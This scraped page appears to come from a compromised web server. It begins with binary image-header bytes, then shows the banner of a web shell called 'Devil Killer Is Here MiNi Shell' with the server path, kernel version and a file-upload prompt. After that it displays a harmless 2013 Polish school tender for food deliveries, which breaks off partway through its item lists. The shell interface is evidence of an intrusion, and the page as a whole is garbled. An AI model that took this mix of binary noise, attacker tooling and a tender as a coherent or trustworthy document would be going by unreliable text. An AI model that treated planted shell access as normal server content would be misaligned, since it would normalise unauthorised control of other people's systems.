JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/495686-N-2013.html

<p class="kh_header"><b>Milicz: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 495686 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Technikum Leśne w Miliczu , ul. Kasztelańska 1, 56-300 Milicz, woj. dolnośląskie, tel. 71 3840718, faks 71 3840718.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła ministra środowiska.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa do internatu Technikum Leśnego w Miliczu spożywczych artykułów sypkich i półproduktów suchych, nabiału, warzyw, owoców, mięsa i wędlin oraz pieczywa wyszczególnionych w układzie asortymentowo - ilościowym..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających nieprzekraczających 20% udzielonego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewidziano</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunków wymaganych od oferentów zostanie dokonana według formuły: spełnia - nie spelnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz środków transportu przewidywanych do realizacji zamówienia z załączoną kserokopią wpisu dokonanego przez PPIS do książki kontroli sanitarnej pojazdu o wyrażeniu zgody na transport artykułów spożywczych lub kserokopią decyzji PPIS o dopuszczeniu pojazdów do przewozu żywności (Rozporządzenie Ministra Zdrowia z dnia 19.12.2002 r. - Dz. U. z 2003 r. nr 21 poz. 179). W wykazie należy podać typ, markę i numer rejestracyjny pojazdu oraz status własności (pojazd własny, dzierżawiony lub inny) - dotyczy wszystkich zadań z wyjątkiem dostaw warzyw nieprzetworzonych oraz jaj. Wykonawca dostarczający warzywa nieprzetworzone oraz jaja, nie musi okazywać kserokopii wskazanego dokumentu. 
Kopię wydanego przez akredytowany podmiot certyfikatu potwierdzającego, że wykonawca spełnia wymagania systemu bezpieczeństwa zdrowotnego żywności HACCP, a w przypadku nieposiadania takiego certyfikatu podpisane przez wykonawcę oświadczenie, że WYKONAWCA wdrożył zasady i spełnia wymagania, o których mowa w ustawie o bezpieczeństwie żywności i żywienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tlmilicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Technikum Leśne w Miliczu, ul. Kasztelańska 1, 56 - 300 Milicz lub na stronie internetowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 12:00, miejsce: Sekretariat Technikum Leśnego w Miliczu, ul. Kasztelańska 1, 56 - 300 Milicz..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty mleczarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser (Danio lub podob.)	szt.	2000
Jogurt 150 ml	szt.	7000
Kefir 0,25l	l.	150
Margaryna mleczna	kg.	150
Margaryna Rama	kg.	20
Margaryna zwykła	kg.	150
Masło roślinne	kg.	50
Masło śmietankowe 	kg.	1500
Maślanka 1l	l.	200
Mleko 2% folia	l.	2500
Mleko 2% karton	l.	100
Mleko 3,2% karton	l.	24
Ser brie 100g	szt.	100
Ser camembert 100g	szt.	100
Ser mozzarella	kg.	15
Ser topiony bloczek 100g	kg.	50
Ser topiony krążek (8 w opak)	szt.	1200
Ser topiony plastry (8 w opak)	szt.	2500
Ser wędzony	kg.	80
Ser żółty (rożne gat.)	kg.	800
Serek homogenizowany 100g	szt.	6000
Serek kiri 100g	szt.	20
Śmietana 12%	l.	600
Śmietana 18%	l.	50
Śmietana 30%	l.	400
Twaróg półtłusty	kg.	700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo zwykłe i cukiernicze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka długa 300g	szt.	50
Bułka drożdżówka	szt.	9000
Bułka grahamka 50g	szt.	3000
Bułka tarta	kg.	400
Bułka zwykła 50g	szt.	36000
Chleb 0,9 kg	szt.	6000
Chleb graham 500g	szt.	1000
Chleb wiejski 2 kg.	szt.	50
Chleb wieloziarnisty 500g	szt.	1000
Ciastka kruche	kg.	20
Ciasto z kremem	kg.	50
Makowiec	kg.	20
Paczek	szt.	9000
Pierniki 	kg.	20
Rogal	szt.	3000
Sernik	kg.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby świeże i mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filety - dorsz	kg.	600
Filety - mintaj	kg.	50
Filety - miruna	kg.	50
Filety - morszczuk	kg.	50
Karp żywy	kg.	100
Makrela wędzona	kg.	150
Pstrąg	kg.	50
Sałatka śledziowa	kg.	150
Śledź matias	kg.	50
Śledź po wiejsku	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i owoce krajowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwinka	pęcz.	100
Brokuły	kg.	100
Brukselka	kg.	100
Brzoskwinie krajowe	kg.	300
Buraki czerwone	kg.	1600
Cebula	kg.	900
Czosnek krajowy	szt.	250
Fasolka szparagowa	kg.	100
Gruszki	kg.	200
Jabłka	kg.	200
Jagody	kg.	100
Kalafior	szt.	100
Kalarepa	szt.	50
Kapusta biała	kg.	2200
Kapusta czerwona	kg.	400
Kapusta kiszona	kg.	2200
Kapusta pekińska	kg.	600
Koper zielony	pęcz.	1200
Marchew	kg.	2100
Ogórki kiszone	kg.	700
Ogórki zielone gruntowe	kg.	200
Ogórki zielone szklarniowe	kg.	600
Papryka	kg.	150
Pietruszka korzeń	kg.	400
Pietruszka zielona	pęcz.	1200
Pomidory gruntowe	kg.	100
Pomidory szklarniowe	kg.	1600
Por	kg.	150
Porzeczka czarna	kg.	400
Rzepa czarna	kg.	50
Rzodkiew biała	kg.	50
Rzodkiewka	pęcz.	100
Sałata	szt.	500
Sałata lodowa	szt.	50
Seler	kg.	1000
Szczypior	pęcz.	400
Truskawki	kg.	200
Ziemniaki	kg.	17000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas puszka	kg.	60
Baton 50g	szt.	4000
Baton czekoladowy 50g	szt.	4000
Baton w czekoladzie 50g	szt.	4000
Bazylia	kg.	2
Brzoskwinia puszka	kg.	100
Budyń 	kg.	10
Chrzan tarty	kg.	110
Ciastka deserowe delicje lub równoważne	kg.	30
Ciastka deserowe markizy lub równoważne	kg.	30
Cukier	kg.	2000
Cukier puder	kg.	2
Cukier waniliowy 16 g	szt.	20
Cukierki czekoladowe 	kg.	50
Curry 20g	szt.	10
Czekolada 100g (Goplana lub Wedel) lub równoważne	szt.	600
Czosnek granulowany	kg.	30
Ćwikła	kg.	40
Draże czekoladowe 100g	szt.	500
Dżem ananasowy	l.	120
Dżem brzoskwinia	l.	120
Dżem czarna porzeczka	l.	120
Dżem wiśnia	l.	120
Fasola biała drobna	kg.	250
Fasola biała Jaś gruby 	kg.	250
Fasola konserwowa biała 	kg.	120
Fasola konserwowa czerwona 	kg.	60
Flaki opak 	kg.	50
Frytura palmowa	kg.	800
Groch łuskany	kg.	300
Groszek konserwowy	kg.	120
Herbata granulowana 	kg.	50
Herbata Lipton torebki 100szt	szt.	25
Herbata liściasta Madras 100g	szt.	200
Herbata liściasta el grey 100g	szt.	200
Kakao 200g	szt.	100
Kakao rozpuszczalne 500g	szt.	10
Kasza gryczana	kg.	120
Kasza jęczmienna	kg.	450
Kasza manna	kg.	10
Kawa Inka 	kg.	10
Kawa ziarnista Jacobs Kronung lub równoważna	kg.	30
Kawa mielona Jacobs Kronung lub równoważna	kg.	30
Kawa rozpuszczalna Jacobs Cronat Gold 200g lub rów.	szt.	20
Kawa rozpuszczalna Maxwell 100g lub rów.	szt.	60
Kawa Woseba mielona lub równoważna	kg.	20
Ketchup 1 L	l.	360
Kisiel	kg.	12
Konserwa mięsna (gulasz angielski 160g)	szt.	1000
Konserwa rybna 170g (szprot, śledź)	szt.	200
Koper suszony	kg.	2
Kukurydza konserwowa	kg.	200
Kwasek cytrynowy 20 g	szt.	100
Liść laurowy	kg.	2
Majeranek	kg.	10
Majonez słoik 700 ml Winiary lub równoważny	szt.	80
Majonez wiadro 3kg Winiary lub równoważny	szt.	140
Makaron gwiazdka drobna	kg.	100
Makaron gwiazdka drobna 100% mąka Durum	kg.	80
Makaron łazanka	kg.	100
Makaron łazanka 100% mąka Durum	kg.	80
Makaron muszelka	kg.	100
Makaron muszelka 100% mąka Durum	kg.	80
Makaron nitka	kg.	100
Makaron nitka 100% mąka Durum	kg.	80
Makaron rurka	kg.	100
Makaron rurka 100% mąka Durum	kg.	80
Makaron ryżowy	kg.	80
Makaron skrętka	kg.	100
Makaron skrętka 100% mąka Durum	kg.	80
Makaron spaghetti	kg.	200
Makaron spaghetti 100% mąka Durum	kg.	200
Marmolada twarda	kg.	10
Mąka tortowa 1 kg	kg.	300
Mąka wrocławska 1 kg	kg.	300
Mąka ziemniaczana 1 kg	kg.	100
Mikołaje czekoladowe 100g	szt.	300
Miód naturalny 500 ml	szt.	10
Musztarda (1 kg)	kg.	180
Napój w proszku 1 kg (rożne smaki)	kg.	200
Natka pietruszki suszona	kg.	2
Ocet 0.5 l	szt.	120
Ogórki konserwowe 	kg.	500
Olej roślinny 1 L	l.	400
Oregano	kg.	2
Paluszki słone 100 g	szt.	50
Papryka chilli	kg.	5
Papryka konserwowa	kg.	150
Papryka mielona ostra	kg.	2
Papryka mielona słodka	kg.	20
Pasta pomidorowa 30% puszka (ok 1 kg)	szt.	100
Pasta pomidorowa 30% puszka (ok 4 kg)	szt.	60
Pasztet drobiowy 160g	szt.	1200
Pasztet wieprzowy ok. 1kg.	kg.	50
Peperonata	kg.	15
Pieczarki marynowane	kg.	100
Pieprz naturalny 1 kg. (mielony)	kg.	35
Pieprz ziołowy	kg.	5
Płatki kukurydziane	kg.	40
Płatki kukurydziane czekoladowe	kg.	80
Pomidory krojone	kg.	10
Przyprawa Degusta 	kg.	30
Przyprawa do bigosu	kg.	5
Przyprawa do drobiu	kg.	25
Przyprawa do gulaszu	kg.	10
Przyprawa do mies	kg.	25
Przyprawa do ryb	kg.	8
Przyprawa do zup 	l.	200
Przyprawa Gyros	kg.	5
Przyprawa Kucharek 	kg.	24
Przyprawa Prymat	kg.	24
Przyprawa szefa	kg.	12
Przyprawa Vegeta wiaderko	kg.	24
Przyprawa Warzywko wiaderko	kg.	200
Rodzynki 	kg.	10
Ryż biały	kg.	250
Ryż parboiled 5kg	kg.	500
Sałatki obiadowe (słoik 1L) (kapusta czerwona)	szt.	36
Sałatki obiadowe (słoik 1L) (z buraków)	szt.	36
Sałatki obiadowe (słoik 1L) (z ogórków konserw.)	szt.	36
Sałatki obiadowe (słoik 1L)(szwedzka)	szt.	36
Smalec	kg.	20
Sok owocowy karton 0,20 l	szt.	2000
Soki koncentrat 5l (różne smaki)	szt.	100
Sos bolognese	kg.	16
Sos cygański	kg.	6
Sos grzybowy	kg.	18
Sos ogrodowy	kg.	50
Sos pieczeniowy	kg.	12
Sos sałatkowy	kg.	49
Sos serowo brokułowy	kg.	20
Sól	kg.	500
Tymianek (opakowanie ok 20g.)	szt.	3
woda mineralna 0,5L gaz/ngaz	szt.	600
woda mineralna 1,5L gaz/ngaz	szt.	2400
Zasmażka ciemna	kg.	6
Zasmażka jasna	kg.	6
Ziele angielskie	kg.	3
Zioła prowansalskie	kg.	2
Zupa w prosz.barszcz bialy-1 kg	kg.	12
Zupa w prosz.barszcz czer-1 kg	kg.	12
Zupa w prosz.borowikowa-1 kg	kg.	12
Zupa w prosz.brokułowa- 1 kg	kg.	12
Zupa w prosz.krem z borow-1 kg	kg.	30
Zupa w proszku żurek -1 kg	kg.	80
Żelatyna	kg.	5
Żurawina 	kg.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.00.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wędliny krótko i długotrwałe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Blok szynkowy	kg.	100
Boczek wędzony	kg.	500
Frankfurterki	kg.	200
Kaszanka	kg.	50
Kiełbasa biała parzona	kg.	60
Kiełbasa biała surowa	kg.	60
Kiełbasa golonkowa	kg.	50
Kiełbasa jałowcowa	kg.	50
Kiełbasa krakowska parzona	kg.	150
Kiełbasa krakowska sucha	kg.	250
Kiełbasa mortadela	kg.	100
Kiełbasa ogniskowa	kg.	100
Kiełbasa sloikowa	kg.	50
Kiełbasa szynkowa	kg.	100
Kiełbasa śląska	kg.	800
Kiełbasa tyrolska	kg.	50
Kiełbasa zwyczajna	kg.	900
Kiełbaski koktajlowe	kg.	50
Metka	kg.	50
Mielonka	kg.	50
Ogonówka	kg.	100
Parówki cienkie	kg.	400
Parówki grube	kg.	400
Pasztet pieczony	kg.	100
Pasztetowa 	kg.	50
Pierś wędzona z indyka	kg.	50
Polędwica drobiowa	kg.	150
Polędwica sopocka	kg.	50
Salceson biały	kg.	50
Salceson czarny	kg.	50
Serdelki	kg.	100
Szynka domowa	kg.	250
Szynka gotowana	kg.	200
Szynka pieczona	kg.	150
Szynka tyrolska	kg.	50
Szynka wędzona drobiowa	kg.	50
Szynkówka	kg.	50
Wątrobianka	kg.	50
Wędzonka krotoszyńska	kg.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso wieprzowe i wołowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek surowy	kg.	100
Golonka peklowana w siatce	kg.	100
Karkówka b/k	kg.	800
Kości wieprzowe schabowe	kg.	300
Łopatka b/k	kg.	1800
Mięso gulaszowe	kg.	100
Mięso mielone	kg.	100
Mięso wołowe rosołowe	kg.	50
Rostbef	kg.	100
Schab b/k	kg.	500
Słonina	kg.	100
Wątroba wieprzowa	kg.	180
Wołowina zrazowa	kg.	50
Żeberka wieprzowe	kg.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mięso drobiowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet drobiowy	kg.	1000
Korpusy drobiowe	kg.	700
Mięso gulaszowe drobiowe I kl	kg.	200
Serca drobiowe	kg.	50
